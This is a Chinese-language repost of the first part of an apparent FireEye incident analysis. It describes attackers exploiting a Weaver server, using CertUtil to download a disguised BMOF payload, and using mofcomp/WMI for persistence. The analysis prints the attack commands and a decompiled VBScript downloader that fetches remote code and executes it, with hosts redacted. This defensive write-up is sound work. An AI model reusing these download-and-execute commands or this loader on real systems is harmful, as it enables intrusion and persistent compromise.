歡迎來到 黑吧安全網 聚焦網絡安全前沿資訊,精華內容,交流技術心得!

新型入侵技術:使用WMI編譯的“.bmf”文件和CertUtil進行混淆執行

來源:本站整理 作者:佚名 時間:2019-11-07 TAG: 我要投稿

這篇文章主要講述了一個有趣的入侵嘗試,FireEye Managed Defense近期阻止了一項利用近期披露漏洞的快速武器化攻擊,在該攻擊中,攻擊者創造性地使用了WMI編譯的“.bmf”文件和CertUtil用于混淆執行。
這一次對入侵活動的成功監測,為我們積累了許多安全方面的寶貴經驗,主要包括:一些攻擊者可以迅速響應,甚至比許多安全團隊的響應速度還要快。在確保業務連續性的情況下,對復雜的軟件環境開展漏洞修復,也許難以跟上攻擊者利用漏洞的步伐,特別是當攻擊者將這些漏洞與針對操作系統自身功能而創造的新型混淆方法相結合,并進行快速利用的時候,人們往往會措手不及。
持續監測
在我們對客戶提供持續監測服務的過程中,FireEye Managed Defense在歐洲一家制造業客戶的系統上發現了可疑文件寫入活動,我們立即在發現可疑事件的主機上收集信息,以開展初步調查。在證據收集完成后,我們開始使用FireEye的Redline取證分析工具中提供的解析器來解析取證數據。經過對日志的分析,我們發現,該主機上執行了一些可疑命令,疑似攻擊者正在進行交互式偵查活動。通常,一旦成功攻陷主機,攻擊者往往會得到一個命令Shell窗口,從而可以在目標主機上執行命令。這些命令可能會與偵查活動相關,所謂偵查活動旨在將關于主機的有用信息暴露給攻擊者。以下是我們觀察到的一些在主機上成功執行的命令:
ipconfig.exe ipconfig /all
whoami.exe whoami
處理上述進程執行的相關父進程為:
\Weaver\jdk_new\bin\javaw.exe
攻擊思路
一旦攻擊者通過利用未知漏洞獲取到對Web服務器的訪問權限后,他們就會嘗試通過Windows Management Instrumentation(WMI)進一步在系統內進行控制。攻擊者利用WMI的執行進程,該進程會以Managed Object Format(MOF)文件作為輸入,將其編譯到WMI緩沖區中,生成一個已編譯的“.bmf”輸出文件。攻擊者編寫了第二階段的Payload,并使用BMI對其進行了編譯。最后,他們將已經編譯的“.bmf”文件上傳至其Web服務器,并將該文件修改并偽裝成“.rar”文件。
在對該惡意活動進行進一步評估后,我們發現,威脅行為者在獲得對目標Web服務器的訪問權限后,他們利用Windows本地二進制文件“Certutil.exe”從遠程位置下載惡意代碼。我們的調查表明,攻擊者使用了下述命令行參數執行了“Certutil.exe”進程的實例:
certutil  -urlcache -split
-f http://[DOMAIN]/uploads/180307/l.rar c:\windows\temp\l.rar
這些參數的作用如下(引用自Microsoft Certutil頁面):
參數:-urlcache
描述:顯示或刪除URL緩存條目
參數:-split
描述:拆分嵌入式ASN.1元素,并保存到文件
參數:-f
描述:強制覆蓋
我們觀察到,Certutil不僅在合法應用程序和正常運行過程中被合理使用,還有可能被威脅行為者非法濫用。
在下載第二階段Payload后不久,我們觀察到一些與“l.rar”(MD5:4084eb4a41e3a01db2fe6f0b91064afa)相關的一些文件寫入事件。特別值得關注的是:
cmd.exe  cmd /c mofcomp.exe C:\Windows\temp\l.rar
cmd.exe cmd /c del C:\Windows\temp\l.rar
上述命令利用Windows的“cmd.exe”解釋器,在新獲得的“l.rar”上運行“mofcomp.exe”。該進程用于分析包含MOF語句的文件,并將該文件中定義的任何類和類實例添加到WMI存儲庫中,然后刪除上述文件。
FireEye Mandiant應急響應專家Christopher Glyer和Devon Kerr在MIRcon 2014會議中發表“討論WMI中的一些關鍵部分”演講,其中提出了攻擊者和防御者利用mofcomp.exe的方式。
建議紅隊和藍隊利用MOF文件:

在研究過程中,我們獲得了“l.rar”文件,并對其進行進一步分析。我們觀察到該文件的文件頭以“FOMB”開始,倒過來即為“BMOF”,也就是二進制管理對象格式(Binary Managed Object Format)。在掌握上述這些信息后,我們就要開始尋找方法,來對已經編譯的二進制文件進行逆向。在FireEye的沙箱環境中分析文件后,我們可以從BMOF文件中獲得以下信息:
On Error Resume Next:execmydler():Function execmydler():Set
P=CreateObject("WinHttp.WinHttpRequest.5.1"):P[.]Open
"GET","hxxp[://[DOMAIN]/d/dl[.]asp",0:P[.]Send():b=P[.]responseText:M=Spli
t(b,",",-1,1):For Each Od In M:Nd=Nd+Chr(Od-
2):Next:Set P=Nothing:If Len(Nd) > 10 Then:Execute(Nd):End If:End
為了偽裝惡意活動,攻擊者編寫了MOF腳本,并將其編譯為BMOF文件,然后通過WMI在受害計算機上運行惡意BMOF文件。前面提到的代碼在執行過程中嘗試從“hxxp[://[DOMAIN]/d/dl[.]asp”下載第二階段的Payload。由于涉及到WMI緩沖區,因此這一攻擊方式將有助于在受害者環境中獲得持久性。
在研究期間,我們還發現了一個名為“bmfdec”的開源項目,這個項目對BMOF文件進行了反編譯。
發現漏洞利用
我們發現攻擊者在9月22日最為活躍,因此我們所開展的大部分調查都在這個時間范圍內進行。通過對FireEye Endpoint Security的事件進行分析后,我們發現了在系統上執行的偵查命令,包括whoami、ipconfig以及下載其他二進制文件。但是,隨著我們對系統的進一步分析,我們沒有在執行這些命令的同一時間范圍內發現任何漏洞利用。我們對HTTP日志進行了分析,該過程中也沒有發現原始Payload。在HTTP日志中,我們發現了可疑的HTTP POST請求,包括對“/weaver/bsh.servlet.BshServlet/”的請求,但遺憾的是,我們所分析的服務器業務較為繁忙,因此日志中沒有記錄到Payload,僅僅包含元數據(Metadata)。

[1] [2] [3]  下一頁

【聲明】:黑吧安全網(http://www.nkppsz.live)登載此文出于傳遞更多信息之目的,并不代表本站贊同其觀點和對其真實性負責,僅適于網絡安全技術愛好者學習研究使用,學習中請遵循國家相關法律法規。如有問題請聯系我們,聯系郵箱[email protected]ack58.com,我們會在最短的時間內進行處理。
  • 最新更新
    • 相關閱讀
      • 本類熱門
        • 最近下載
        秒速时时彩骗局